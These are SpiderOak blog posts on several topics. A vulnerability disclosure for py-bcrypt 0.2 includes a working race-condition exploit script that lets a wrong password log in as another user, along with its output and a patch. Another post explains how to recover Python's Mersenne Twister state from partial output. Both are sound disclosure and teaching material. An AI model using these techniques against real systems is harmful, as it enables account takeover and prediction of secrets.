Conversations about life & privacy in the digital age

Ask American computer security expert, Jon Callas

You know that crazy interview question, “If you could have dinner with any famous person, living or dead, who would it be?”

Well, someone the other night answered, Jon Callas. Perhaps several of you out there share an interest in cryptography and information security and would also enjoy the opportunity to ask him some questions.

While we can’t set up a dinner meeting between you and Jon, we can pass along your questions. Jon has graciously granted us the opportunity to send over our readers’ most burning questions for him to answer.

Take the weekend to submit your questions in the comment section and the folks over here at SpiderOak will pick the best 10 to be submitted to Jon.

Who knows, maybe you’ll get a dinner out of this after all…

Security Vulnerability in Py-Bcrypt 0.2

This blog post is probably only interesting to programmers. Regular SpiderOak users can safely ignore this article. (It is not related to the SpiderOak backup and sync software.)

There’s a security vulnerability with py-bcrypt.

The vulnerability allows an attacker (“Eve”) to login as any user by making a
login attempt with a bogus password, overlapping in thread execution with the
user’s own login attempt. Typically many such attempts will be needed, but one will
eventually succeed.

This is a synchronization vulnerability with concurrent use of the
encrypted static buffer in bcrypt.c. Only threaded applications should be
vulnerable. It is common to use threads for bcrypt auth since it can cause an
event driven application to block the event loop for an unacceptable time.
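
For an application that cannot change its bcrypt library right away, one conceivable stopgap is to make sure only one thread at a time enters the code that touches the shared static buffer. The sketch below is an assumption of mine, not something taken from py-bcrypt or its maintainers: the `serialized` helper and the `_hash_lock` name are hypothetical, and the approach gives up the concurrency that releasing the GIL was meant to provide.

```python
import threading

# One process-wide lock shared by every wrapped call (hypothetical name).
_hash_lock = threading.Lock()

def serialized(func):
    """Return a wrapper that lets only one thread at a time run func."""
    def wrapper(*args, **kwargs):
        with _hash_lock:
            return func(*args, **kwargs)
    return wrapper

# Intended use, assuming py-bcrypt is installed:
#   import bcrypt
#   safe_hashpw = serialized(bcrypt.hashpw)
#   ok = safe_hashpw(password, stored) == stored
```

Every caller has to go through the wrapped function for this to help; a single direct call to the unwrapped function from another thread would reopen the race.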

I went looking through the py-bcrypt code after noticing suspicious patterns of
auth failures while testing a project using bcrypt.

The vulnerability was added in bcrypt 0.2, which was released in
July 2010 (http://www.mindrot.org/projects/py-bcrypt/news/rel02.html).

This vulnerability is not present in bcrypt 0.1 because it did not release the
GIL during bcrypt operations.

Prior discovery? Sönke Schau reported a
thread safety bug in this area to the Google Code project back in January 2013
(https://code.google.com/p/py-bcrypt/issues/detail?id=12).
It seems from the description (i.e. Priority: Medium) that the security
implications were unclear at the time.

Below is a demo exploit, sample output from the demo, a patch to py-bcrypt to mitigate the vulnerability, and output from the demo after patching.

The maintainers published an update within an hour of my initial message (wow!). There’s now a py-bcrypt 0.3 available on Google Code and PyPI.


#!/usr/bin/env python
"""
demo exploit for py-bcrypt 0.2

The demo below includes a server class with one user, alice,
with a bcrypted password.  The server is event driven using
Twisted with bcrypt operations deferred into a thread pool.
Eve tries to login repeatedly with a bogus password while
Alice is also trying to log in.
"""

import time
import random
import sys
import bcrypt
from twisted.internet import reactor, defer
from twisted.python import log
from twisted.internet.threads import deferToThread

# if we instead set this bcrypt work factor to 4 (the minimum) the demo exploit
# succeeds much sooner.  12 is the default.
BCRYPT_LOG_ROUNDS = 12

def salt_and_bcrypt(password):
    "return the salted and bcrypted representation of a password"
    salt = bcrypt.gensalt(BCRYPT_LOG_ROUNDS)
    return bcrypt.hashpw(password, salt)

def check_bcrypt(password, crypted):
    "return boolean, comparing a plain password to a bcrypt stored value"
    check_value = bcrypt.hashpw(password, crypted)
    return check_value == crypted 

def sleep_to_delay_thread(delay):
    "just used to add additional noise into the timing of the thread pool"
    time.sleep(delay)
    return True

class DemoExploitableServer(object):
    """
    Simple server class.  This could be a web server, ftp, RPC, etc.

    The same vulnerability exists if the server is available over a network.
    Here everything happens in one process for brevity.
    """

    users = dict(alice = salt_and_bcrypt("mypassword"))

    def __init__(self, num_busywork_threads):
        self._login_attempt_count = 0
        self.exploited = False
        self.halt = False
        if num_busywork_threads:
            reactor.callLater(0, self._simulate_activity, num_busywork_threads)

    def notify_shutdown(self):
        "notify the server that the event loop is shutting down"
        self.halt = True

    def login(self, username, password):
        """
        make a login attempt to the server.
        Return a Deferred that will be called back with the login result bool
        """

        if self.halt:
            # just ignore forever
            deferred = defer.Deferred()
            return deferred

        self._login_attempt_count += 1

        # show some progress in the log. usually don't get that far.
        if self._login_attempt_count % 1000 == 0:
            log.msg("%d login trials" % ( self._login_attempt_count, ))

        # delayed False on nonexistent user
        if username not in self.users:
            deferred = defer.Deferred()
            reactor.callLater(5, deferred.callback, False)
            return deferred

        return deferToThread(check_bcrypt, password, self.users[username])

    def _simulate_activity(self, amount):
        "start N busy work loops (deferring work to thread pool)"
        for _ in range(amount):
            reactor.callLater(0, self._do_busy_work)

    def _do_busy_work(self):
        "defer a random blocking sleep call to a thread"
        if self.halt:
            return
        delay = 2.0 * random.random()
        deferred = deferToThread(sleep_to_delay_thread, delay)
        deferred.addCallback(self._busy_work_callback)

    def _busy_work_callback(self, _result):
        "repeat the busy work cycle"
        reactor.callLater(0, self._do_busy_work)

class UserBase(object):
    "base for Alice and Eve--users repeatedly trying to login to the server"
    def __init__(self, server):
        self._server = server

    def run(self):
        "start the login trial loop"
        reactor.callLater(0, self.try_login)

    def try_login(self):
        "make a login attempt.  The server will callback with the result"
        deferred = self._server.login(self._username, self._password)
        deferred.addCallback(self._login_callback)
        deferred.addErrback(log.err)

class Alice(UserBase):
    """
    Alice repeatedly tries to login w/ the correct password.
    It's normal that she succeeds, and noteworthy when she fails.
    """
    _username = 'alice'
    _password = 'mypassword'
    def _login_callback(self, result):
        if not result:
            log.msg("alice login failure")
        reactor.callLater(0, self.run)

class Eve(UserBase):
    """
    Eve repeatedly tries to login as Alice w/ a bogus password.
    The exploit is successful when Eve's login is valid.
    """
    _username = 'alice'
    _password = 'WRONG_PASSWORD'
    def _login_callback(self, result):
        if result:
            log.msg("eve login success")
            self._server.exploited = True
            reactor.stop()
        else:
            log.msg("eve login fail")
        reactor.callLater(0, self.run)

def spawn_user(server, user_class):
    """
    create a user instance, and schedule delay calls to the event loop to start the
    instance's login trial loop
    """
    new_user = user_class(server)
    reactor.callLater(0, new_user.run)

def run_exploit_demo():
    """
    setup the demo exploitable server instance and a few user instances trying
    to login.  Manage the event loop startup/shutdown. Report results.

    Return shell exit code: 1 on exploit failure, 0 on success
    """
    num_alice = 5
    num_eve = 5
    server_busywork_threads = 5

    log.startLogging(sys.stdout)

    server = DemoExploitableServer(server_busywork_threads)

    for _ in range(num_alice):
        spawn_user(server, Alice)

    for _ in range(num_eve):
        spawn_user(server, Eve)

    # timeout after an hour
    def _timeout():
        log.msg("timeout reached")
        reactor.stop()

    reactor.callLater(3600, _timeout)

    reactor.suggestThreadPoolSize(30)

    reactor.addSystemEventTrigger("before", "shutdown", server.notify_shutdown)

    reactor.run()

    # if we get here, Eve has logged in or we have crashed or timed out
    if server.exploited:
        print "EXPLOITED: successful login by Eve as Alice"
        return 0
    else:
        print "NO exploit"
        return 1

if __name__ == '__main__':
    sys.exit(run_exploit_demo())


Here’s sample output, before and after patching.

ubuntu@dev$ /opt/py2.7.vulnerable_bcrypt/bin/python pybcrypt_exploit_poc.py
2013-03-17 18:42:31+0000 [-] Log opened.
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login success
2013-03-17 18:42:33+0000 [-] Main loop terminated.
2013-03-17 18:42:33+0000 [-] EXPLOITED: successful login by Eve as Alice
ubuntu@dev$ /opt/py2.7/bin/python pybcrypt_exploit_poc.py
... [ snip ] ...
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] timeout reached
2013-03-17 19:08:19+0000 [-] Main loop terminated.
2013-03-17 19:08:19+0000 [-] NO exploit

I use C only very occasionally, but in case it’s helpful, here’s my attempt at a resolution patch. (Don’t use this. The patch provided by the maintainers in bcrypt-0.3 looks much more portable!)

diff -r py-bcrypt-0.2/bcrypt/bcrypt.c py-bcrypt-0.2.patched/bcrypt/bcrypt.c
75c75,84
< static char    encrypted[128];
---
> #undef threadlocal
>     #ifdef _ISOC11_SOURCE
>         #define threadlocal _Thread_local
>     #else
>         #define threadlocal __thread
>     #endif
>     /* we would rather blow up at compile time than be without thread safety.
>      * */
>
> static threadlocal char    encrypted[128];

Git, clients, partners, and woes.

This post comes from the “hindsight is twenty-twenty” department. A
few years ago when we started our White Label program, we were
wondering how to manage the different client branding, GUI
customization, etc. Our first thought was “I know! We’ll use
git!”

Then we had two problems.

We used to use one branch in git per white label partner. The
intention was that we would then effortlessly merge across updates and
ship updates and have everything happy. Reality, however, quickly set
in. Every partner branch needed to be kept track of and manually
merged with HEAD. Because we are a distributed company, keeping git branch
discipline is hard enough when there’s one production branch, and much
worse when someone may commit last-minute bug fixes under the gun on a
completely different production branch. Once that happens, you need to
round up the branches and start merging back, up, down, and heaven
help you if you wind up with a mutually exclusive merge
conflict. Things wound up in a state where our white label clients
would lag months and months behind our production SpiderOak client at
best.

Our first attempt consolidated our generic white labels down to two
branches based on core GUI features included. This did a great job of
reducing complexity, but it left many very interestingly
customized clients still in their own branches, and it left us needing
to make sure every branch was still lovingly merged and that fixes
accidentally committed to the wrong branch got brought everywhere
else. Something else was needed.

Our first step was to overhaul the builder, which we completed
recently. This gives us a flexible resource framework to drop in
everything from images to configuration files. The next step is to
boil down all our custom white label code into client code and builder
configuration files, which will again bring us back to one
production branch for everything we ship.

What does this mean for you, fair customer? The primary win is that
now, especially as we maintain multiple brands just under SpiderOak alone
these days, we will be able to work on features much more quickly and
deploy them to everyone. Bugs found by partners don’t get fixed only
for partners that report them, but for everyone. And finally, we get
only one, single place that we have to aim CI and testing tools. This
results in a far better SpiderOak experience.

And it sure results in a huge reduction in the number of grey hairs
we accumulate with every release cycle. Our takeaway here at SpiderOak
is to really examine every new process we try to introduce and
to imagine how it will look even just a single year down the road. On the surface,
using git to manage different production releases of SpiderOak seemed
to be a splendid idea. After a couple of years? Worst. Idea. Ever.

Exploit Information Leaks in Random Numbers from Python, Ruby and PHP

The Mersenne Twister (MT 19937) is a pseudorandom number generator used by Python and many other languages, such as Ruby and PHP. It is known to pass many statistical randomness tests, but it’s also known not to be cryptographically secure. The Python documentation is clear on this point, describing it as “completely unsuitable for cryptographic purposes.” Here we will show why.

When you are able to predict pseudorandom numbers, you can predict session ids, randomly generated passwords or encryption keys and know all the cards in online poker games, or play “Asteroids” better than legally possible.

Many sources have already shown that it’s easy to rebuild the internal state of the MT by using 624 consecutive outputs. But this alone isn’t a practical attack, because it’s unlikely that you have access to the whole output. In this post I’ll demonstrate how to restore its internal state by using only parts of its output. This will allow us to know all previous and future random numbers it generates.

With every 32-bit output the MT directly exposes 32 bits of its internal state (only slightly and reversibly modified by the tempering function). After each round of 624 outputs, the internal state of the Mersenne Twister is itself “twisted”: all bits are XOR’d with several other bits. In fact the Mersenne Twister is just a big XOR machine: all its output can be expressed as a sequence of XORs of the initial state bits.
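
To make “reversibly modified” concrete, here is a minimal sketch of the standard MT19937 tempering step and its inverse. The shift amounts and masks are the published MT19937 constants; the helper names (`temper`, `untemper`, `_undo_right`, `_undo_left`) are my own and are not taken from the POC code mentioned in this post.

```python
import random

def temper(y):
    """MT19937 tempering: turns one 32-bit state word into one output."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & 0xFFFFFFFF

def _undo_right(y, shift):
    """Invert x ^ (x >> shift) by recovering the bits from the top down."""
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ (x >> shift)
    return x

def _undo_left(y, shift, mask):
    """Invert x ^ ((x << shift) & mask) by recovering bits from the bottom up."""
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ ((x << shift) & mask)
    return x & 0xFFFFFFFF

def untemper(y):
    """Undo the four tempering steps in reverse order."""
    y = _undo_right(y, 18)
    y = _undo_left(y, 15, 0xEFC60000)
    y = _undo_left(y, 7, 0x9D2C5680)
    y = _undo_right(y, 11)
    return y

# A full 32-bit output gives back the state word it came from.
rng = random.Random(2013)
output = rng.getrandbits(32)
state_word = untemper(output)
assert temper(state_word) == output
```

This only works when all 32 bits of an output are visible, which is exactly what the byte-sized outputs discussed next take away.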

Python always combines two outputs into a 64-bit integer before returning them as random integers. So each call of random.randint(0,255) gives you only 8 bits out of two 32-bit Mersenne Twister outputs. Since the tempering function has already mixed the bits of each 32-bit output, it’s no longer possible to directly recover internal state bits from only those 8 bits.

I was curious if it’s hard to recover the internal MT state by using only the output of a function like this:

import random

def random_string(length):
    return "".join(chr(random.randint(0, 255)) for i in xrange(length))

Since the internal state of the Mersenne Twister consists of 19968 bits (624 words of 32 bits each), we will need at least ~2.5 KB of output to recover the internal state. In fact I needed ~3.3 KB, probably because of redundant output information. A bug in my POC implementation is also possible :)

You can find the result on github.

How does it work?

First I named the initial state with variables s0…s19967. The initial state looks like this:

Internal state bit    Value
0                     s0
1                     s1
...                   ...
19967                 s19967

Now the first output of the Mersenne Twister is a combination of the first 32 bits (combined by the tempering function):

Output-Bit    Value
o0            s0 xor s4 xor s7 xor s15
o1            s1 xor s5 xor s16
o2            s2 xor s6 xor s13 xor s17 xor s24
...           ...
o31           s2 xor s9 xor s13 xor s17 xor s28 xor s31

same for the second output:

Output-Bit    Value
o32           s32 xor s36 xor s39 xor s47
...           ...

But we can only observe eight of these bits, because random.randint(0,255) exposes only this portion of the output.

After 624 outputs, the internal state of the Mersenne Twister is “twisted” around. We update our internal state as an xor-combination of our old indices.

Internal state bit    Value
0                     s63 xor s12704
1                     s0 xor s12705
...                   ...
19967                 s61 xor s62 xor s5470 xor s5471 xor s18143

The outputs now look more complicated, because the state bits are themselves xor-combinations of the initial state:

Output-Bit Value
o19968 s35 xor s38 xor s46 xor s63 xor s12704 xor s12708 xor s12711 xor s12719

After 3.3 KB of output, each such list contains about 40 variables.

Now we have a big list of output bits and how each is made from an xor-combination of the original state: a big system of equations that we can solve! This is done the way you learned it at school. Here’s a simple example for 3 bits.

Given this system of equations:

o1 = s0 xor s1 xor s2
o2 = s1 xor s2
o3 = s0 xor s1
 
First we solve s0:
 
o1 = s0 xor s1 xor s2
o2 = s1 xor s2
=>
o1 xor o2 = s0
 
With this solution it’s easy to find a solution for s1.
 
o3 = s0 xor s1
o1 xor o2 = s0
=>
o1 xor o2 xor o3 = s1
 
And finally for s2.
 
o2 = s1 xor s2
o1 xor o2 xor o3 = s1
=>
o1 xor o3 = s2
 
Result:
 
o1 xor o2 = s0
o1 xor o2 xor o3 = s1
o1 xor o3 = s2

Now we know how to recover the 3-bit state out of our 3 output-bits:
s0 = o1 xor o2
s1 = o1 xor o2 xor o3
s2 = o1 xor o3

However, in reality we have about 26,000 equations with 20,000 variables.
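
The same elimination can be written down generically as Gaussian elimination over single bits, where adding two equations means XOR-ing them. The following is a small sketch under my own assumptions, not the code from the POC: each equation is stored as an integer bitmask (bit i set means s_i appears) plus the observed output bit, and `solve_xor_system` is a hypothetical name.

```python
def solve_xor_system(equations, num_vars):
    """Solve XOR equations given as (mask, bit) pairs; return [s0, s1, ...]."""
    pivots = {}  # variable index -> (mask, bit) of the row that defines it
    for mask, bit in equations:
        # Remove every variable that already has a pivot row.
        for var, (pmask, pbit) in pivots.items():
            if (mask >> var) & 1:
                mask ^= pmask
                bit ^= pbit
        if mask == 0:
            if bit:
                raise ValueError("inconsistent equations")
            continue  # redundant equation, carries no new information
        var = mask.bit_length() - 1  # use the highest remaining variable
        # Keep the older pivot rows free of the new pivot variable.
        for other, (omask, obit) in list(pivots.items()):
            if (omask >> var) & 1:
                pivots[other] = (omask ^ mask, obit ^ bit)
        pivots[var] = (mask, bit)
    if len(pivots) < num_vars:
        raise ValueError("not enough independent equations")
    return [pivots[i][1] for i in range(num_vars)]

# The 3-bit example from above, for the secret state s0=1, s1=0, s2=1:
#   o1 = s0 xor s1 xor s2 = 0
#   o2 = s1 xor s2        = 1
#   o3 = s0 xor s1        = 1
equations = [(0b111, 0), (0b110, 1), (0b011, 1)]
state = solve_xor_system(equations, 3)
```

Redundant equations are simply skipped, which is one way to cope with having more equations than variables.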

If you want to try it yourself, you can download the result of the solved equation together with a test-program on github.

Further notes

Since the Mersenne Twister is highly symmetric, it’s probably possible to find some shortcuts or a fully mathematical solution for this problem. However, I implemented the straight-forward solution since it’s easy and reusable.

Python seeds the Twister with only 128 bits of “real” randomness. So theoretically it’s enough to know a few output bytes to restore the whole state, but you would need an efficient attack on the seeding algorithm since 128 bit is too much for a brute-force attack.

However, other implementations use much less randomness to seed their random number generators. PHP seems to use only 32 bits for seeding mt_rand, and Perl also uses only 32 bits (but another PRNG). In these cases it’s probably easier to use a brute-force attack on the seed.
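
As a rough illustration of what a brute-force attack on a small seed looks like, here is a toy sketch. It uses Python’s own random module with an artificially tiny 16-bit seed space so that it finishes quickly; it does not model PHP’s or Perl’s actual seeding, and the names `sample_bytes` and `brute_force_seed` are made up for this example.

```python
import random

def sample_bytes(seed, count=8):
    """Return the first `count` byte-sized outputs for a given seed."""
    rng = random.Random(seed)
    return [rng.randint(0, 255) for _ in range(count)]

def brute_force_seed(observed, seed_bits=16):
    """Try every seed below 2**seed_bits until the outputs match."""
    for candidate in range(2 ** seed_bits):
        if sample_bytes(candidate, len(observed)) == observed:
            return candidate
    return None

# The "victim" picks a seed from the small space; we only see 8 bytes.
secret_seed = 4242
observed = sample_bytes(secret_seed)
recovered = brute_force_seed(observed)
```

A real 32-bit search is about 65,000 times larger than this toy space, which is still small next to the 128 bits Python uses.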

HTML5 Mobile Client Open Development Project

I’m happy to announce that SpiderOak will be proceeding with its development of the new mobile client as an open development project. We are eager to arrange greater access to progress, as it proceeds, and to provide more opportunities for interested users to contribute, in various ways.

This means that we will be continuing our work on the new, HTML5-based client application in the open, including open sourcing the code base and also conducting our planning and coordination as openly and transparently as we can.

Project Process

SpiderOak will continue to lead development of the client. Members of our team, including the developer who has been working on the code to date (me), will be dedicated to the project. (I have had substantial involvement in open source development, at a few points in my career. It’s the way I prefer to work, so I’m particularly pleased with this turn of events.)

We will use a repository methodology, Fork & Pull, which is organized so that many people, both inside and outside an organization, can be involved and contribute.

Last week we ported the internal code repository to a publicly accessible github repository in the SpiderOak github organization, and started staking out the milestones/issues in the repository tracker. We also started to port the documentation to the repository wiki from its former home, the docs subdirectory of the code section.

Besides basic project orientation, the document providing orientation on the code architecture and other technical details has been ported to the wiki.

(That document also includes info about running the application from local files – currently necessary for testing it. Specifically, in order to run the application, you have to clone a local copy of the repository, using git, and then use a specially conditioned browser session to visit it. We’re working on providing a proxy by which anyone can try current versions of the development code just by pointing your browser at the right address.)

Plans

By the end of the year, we aim (milestone) to implement a single core application, with platform variants, that has equivalent functionality to the existing iOS and Android native mobile clients. It is being implemented in HTML5 / CSS / Javascript, with hybrid (PhoneGap) native extensions to fill in functionality gaps.

That is just the beginning.

HTML5 and, particularly, Javascript are becoming increasingly capable as
application platforms, along with the mobile platforms themselves. After the initial
release milestone we plan to incorporate full ‘Zero-Knowledge’ operation,
including cryptographic encryption, local to the devices – like what
happens in the desktop client. As new SpiderOak secure collaboration
features emerge, we will implement them in this mobile client.

We are also excited about the possibility of using elements of the mobile HTML5 code as a common basis for desktop and browser HTML5 clients. The possible economies of sharing components between the desktop and mobile, plus the higher-level UI framing – HTML5/CSS/Javascript versus pyQt – may make it worth our while to re-engineer the desktop, and realize the benefits of greater development agility in the whole range, mobile to desktop, going forward.

Why Open Source/Free Software?

There are many reasons to conduct development of the HTML5 mobile client based on open source.

  • In general, we want to enable maximum access to SpiderOak services, including enabling others to use our code to inform their own efforts to use our services.

  • More, though, we want to arrange so that you, our users, can have thorough access, and not be in the dark about what is coming. You can help us understand what you need, and what we’re overlooking. You can contribute – help each other answer questions, fill in documentation gaps, identify problems and fix and devise code.

  • Some of the functionality we plan to implement will rely on innovations, like Javascript-based cryptography. Those innovations will be most useful to us, as well as to others, if they can be taken up and refined and strengthened by widespread use, beyond our projects. An open development process can help promote that kind of effect.

  • Ultimately, SpiderOak’s founders, and the team they have gathered in the company, have accumulated deep experience with and benefits from open source/free software. We see those benefits increasing, for us as well as for others, by applying open methodologies to development of this and other projects.

How Can You Get Involved?

Opening this project allows anyone to evaluate and contribute, not just code, but also designs, plans, and ideas that will be discussed online.

We are just starting this as an open development project, and will have some shaking out to do – as well as an end-of-the-year deadline that is first priority – but we are looking forward to shaping a good collaboration, with your help, and have started the steps to enable it.

Now Hiring –> JavaScript / HTML5 Engineer

We’re looking for an excited JavaScript hacker to join us and help us
advance state-of-the-art technology implementation in
JavaScript. We’re looking to do some Cool New Things on the web that
have been traditionally limited to our desktop client, and need
someone who can help us push that along.

Do you enjoy trying to push the bounds of browser-boxed computing?
Have you experience with cryptography? Enjoy getting that last little
bit of performance out of V8 as Chrome makes your computer levitate
with the cooling fans spinning up? We want you! You’ll be working with
our existing team of web engineers to bring out new technology and
products allowing people to use SpiderOak in a private fashion no
matter where they are or what kind of device they are on. You’ll be
working on HTML5 webapps with more and more JavaScript getting pushed
further and further beyond the competition.

To hop on board and immediately get rolling, we expect that you
have a grasp of or can very rapidly come up to speed on a wide variety
of technologies around HTML5, including but not limited to:

You’ll have to be comfortable dealing with SQL for data, as well as a
Unix platform for deployment (Ubuntu, specifically). We have an
emphasis on test-driven development that you will be jumping in
to. Finally, our backend software is all in Python, and knowing that
is a major plus but not immediately necessary. If you already know
the above, chances are you can learn a new language if it comes to
that.

If you want to join in on our merry adventure, you will need a
functional grasp of English (don’t worry, we have several staff
on-board already for whom it’s a second or third language). You will
also be expected to occasionally travel (at company expense) to have
some quality face-to-face time. Important cities in the SpiderOakVerse
are San Francisco, CA, Kansas City, MO, and Chicago, IL (for
reference, these three cities make up about half of SpiderOak). A
sense of humor is always appreciated and welcome.

Still interested? Send an email to
jobs@spideroak.com including “web engineer” in
the subject with a little about yourself and your experience to date
(a ‘cover letter’ if you will). NOTE: Resumes are not required as who
you are is more important than what your resume may or may not say. If
we enjoy your thoughts and feel like you will be a good fit, we will
send you a small task to complete. Please do be sure to tell us a bit
about yourself, what you can do, and why you’d like to work for
us. English only, please.

We know there’s talent in everyone regardless of what little papers
might say, so we have no “minimum” requirements for degrees. We’re
also super-equal-opportunity: quality hacking knows no bounds for
race, gender, nationality, sexual orientation, species[1], or
religion. If you can meet what we need, we’ll do amazing things
together, no matter who, what, or where you are.

Footnotes:

1: The Management would prefer llamas with experience in piloting
luxury yachts.

Speeding up and running legacy test suites, part two

This is part two in a two part series on Test Driven Development at
SpiderOak. In part one,
I discussed ways to decrease the time it takes to run a test suite. In part
two, I discuss two ways to run a test suite that are painful if the tests are
slow, but greatly beneficial if performed often with fast tests.

Once we have tests that run in milliseconds rather than minutes, we’ll want
to run them as often as possible. As I work, I’m constantly saving the current
file and running the tests, as is necessary when practicing test-driven
development. Rather than switching to a command prompt after each change in
order to run the tests, I just map a key in vim to do it automatically.

Whenever I start a programming session, I open the module I’m working on and
its corresponding test module in a vertical split in vim. SpiderOak has a few
runtime dependencies, and because we don’t use the system-provided Python
interpreter on Mac, I have to source a script to set up the runtime
environment. When running commands from vim, the environment is inherited, so
by sourcing the script before running vim, things work just as they would if
you invoke them from the command line directly.

$ (. /opt/so2.7/bin/env.sh; PYTHONPATH=some_path vim -O package/module.py package/test/test_module.py)

Once I’m in vim, I map a key to run the tests, modifying the mapping for
whatever module I happen to be working on.

:map ,t :w\|:!python -m package.test.test_module<CR>

This binds ,t to first write the file, then run python -m
package.test.test_module. Of course, this will change depending on what
you’re working on and how you invoke your tests.

Running tests on a range of git commits

In my git workflow, I sometimes find myself staging changes piecemeal, or
rebasing, reordering, or squashing commits. These kinds of actions can lead to
commits with code in a state that hasn’t been tested. To make testing these
intermediate states easier, I have adapted a script from Gary Bernhardt
to check out each commit in a given range and
run a command on the result. Here’s my adapted version of the script:

#!/bin/bash
set -e

ORIG_HEAD=$(git branch | grep '^*' | sed "s/^* //" | grep -v '^(no branch)' || true)
REV_SPEC=$1
shift

git rev-list --reverse $REV_SPEC | while read rev; do
    echo "Checking out: $(git log --oneline -1 $rev)"
    git checkout -q $rev
    find . -name "*.pyc" -exec rm {} \;
    "$@"
done
if [ $? -eq 0 ]; then
    [ -z "$ORIG_HEAD" ] || git checkout -q "$ORIG_HEAD"
fi

This keeps track of the current HEAD, checks out each revision in the
provided range, and then runs whatever command follows the range on the command
line. If all goes well, it will check out the original HEAD, to leave you back
where you started. If at any point the command exits with an error code, the
process will stop, so you can fix the problem.

For example, to run the command python test/run_all_tests.py on
every commit between origin/master and the current HEAD, you would
run:

$ ./run_command_on_git_revisions.sh origin/master.. python test/run_all_tests.py

Using the tools and techniques from this post and part
one (/blog/20121015153905-speeding-up-and-running-legacy-test-suites-part-one), I am able to run the SpiderOak tests quickly, after every change. This
enables me to use a TDD approach and not be slowed down by sluggish tests. With
the confidence that a comprehensive suite of tests provides, I can make
sweeping changes to parts of the SpiderOak code without worrying if I broke
something. Moreover, if I’m unsure of a solution, I can just try something and
see if it works. Because I’m not slowed down by the tests, trying an unproven
solution is rarely too large of an investment. Plus, there’s something
satisfying about making a large test suite pass in the blink of an eye.

Speeding up and running legacy test suites, part one

This is part one in a two part series on Test Driven Development at SpiderOak.
In part one, I discuss ways to decrease the time it takes to run a test suite.
In part two, I’ll discuss two ways to run a test suite that are painful if the
tests are slow, but greatly beneficial if performed often with fast tests.

As any experienced developer will likely say, the longer a test suite takes to
run, the less often it will be run. A test suite that is seldom run can be
worse than no test suite at all, as production code behavior diverges from that
of the tests, possibly leading to a test suite that lies to you about the
correctness of your code. A top priority, therefore, for any software
development team that believes testing is beneficial, should be to maintain
fast tests.

Over the years, SpiderOak has struggled with this. The reason, and I suspect
many test suites run slowly for similar reasons, is tests which claim to be
testing a “unit”, but actually end up running code from many parts of the
system. In the early days of SpiderOak we worked around some of the problem by
caching, saving/restoring state using test fixtures, etc. But a much better
approach, which we’re in the process of implementing, is to make unit tests
actually test small units rather than entire systems. During the
transition, we still have the existing heavy tests to fall back on, but for
day-to-day development, small unit tests profoundly increase productivity.

There are many techniques for keeping tests small and fast, and even more for
transitioning a legacy test suite. Each code base will ultimately require its
own tricks, but I will outline a few here that we’ve adopted at SpiderOak.

Mocks

Mock objects are “stand-in” objects that replace parts of your code that are
expensive to set up or run, such as encryption, network access, or disk
access. Using mocks can greatly improve the running time of your tests. At
SpiderOak, we use Michael Foord’s excellent
Mock library.
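
As a minimal sketch of the idea, the example below uses unittest.mock, the
standard-library version of the Mock library (available since Python 3.3). The
function backup_file and its encrypt and upload parameters are hypothetical
names chosen for illustration; they are not taken from the SpiderOak code.

```python
from unittest.mock import Mock


def backup_file(data, encrypt, upload):
    """Encrypt data and hand the result to an uploader (hypothetical function)."""
    ciphertext = encrypt(data)
    upload(ciphertext)
    return len(ciphertext)


# Stand-ins for the expensive collaborators: no real crypto, no network.
fake_encrypt = Mock(return_value=b"ciphertext")
fake_upload = Mock()

size = backup_file(b"plain", fake_encrypt, fake_upload)

# The mocks record how they were called, so the test can check the wiring.
fake_encrypt.assert_called_once_with(b"plain")
fake_upload.assert_called_once_with(b"ciphertext")
```

The test exercises only the logic in backup_file; the slow parts are replaced
by objects that return immediately.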

One area where mocking has been particularly helpful in speeding up the legacy
tests in SpiderOak is startup time. In some cases, even if
individual tests run quickly, running the test suite can still take a long time
due to unnecessary startup costs, such as importing modules unrelated to the
code under test. To work around this, I often inject a fake module into
Python’s import system to avoid loading huge amounts of code orthogonal to what
I’m trying to test. As an example, at the top of a test module, you might see
the following:

import sys
from test.util import Bucket

# don't waste time importing the real things, since we're isolating anyway
sys.modules['foo'] = Bucket()
sys.modules['foo.bar'] = sys.modules['foo'].bar

import baz

How it works

When you import a module in Python, the interpreter first looks for it in
sys.modules. This speeds up subsequent imports of a module that has already
been imported. We can also take advantage of this fact to prevent importing of
bloated modules altogether, by sticking a lightweight fake object in there,
which will get imported instead of the real code.

In the example above, foo is a bloated module that takes a long time to load,
and baz is the module under test. baz imports foo, so without this
workaround, the test would take a long time to load as it imports foo. Since
we’re writing isolated unit tests, using Mocks to replace things in foo, we
can skip importing foo for the tests altogether, saving time.
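
The lookup order described here can be seen in a small self-contained sketch.
The module name slow_dependency_demo is made up for this illustration, and
nothing by that name needs to exist on disk. A plain types.ModuleType stands in
for the fake object.

```python
import sys
import types

# Hypothetical module name; no such file has to exist.
fake = types.ModuleType("slow_dependency_demo")
fake.expensive_call = lambda: "stubbed"

# Place the fake in the module cache before anything imports the name.
sys.modules["slow_dependency_demo"] = fake

# The import statement finds the cached entry and never searches the disk.
import slow_dependency_demo

result = slow_dependency_demo.expensive_call()
same_object = slow_dependency_demo is fake

# Remove the entry again so later imports are not affected.
del sys.modules["slow_dependency_demo"]
```

Removing the entry afterwards keeps the fake from leaking into other test
modules that run in the same process.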

Bucket is a simple class that I use whenever I need an object on which I can
access an arbitrary path of attributes. This is perfect for fake package/module
structures, so I often use it for this purpose.

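from collections import defaultdict

class Bucket(defaultdict):
    def __init__(self, *args, **kw):
        super(Bucket, self).__init__(Bucket, *args, **kw)
        self.__dict__ = self

    def __getattr__(self, name):
        # attribute lookup reads __dict__ directly and skips the defaultdict
        # factory, so create missing attributes through item access instead
        return self[name]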

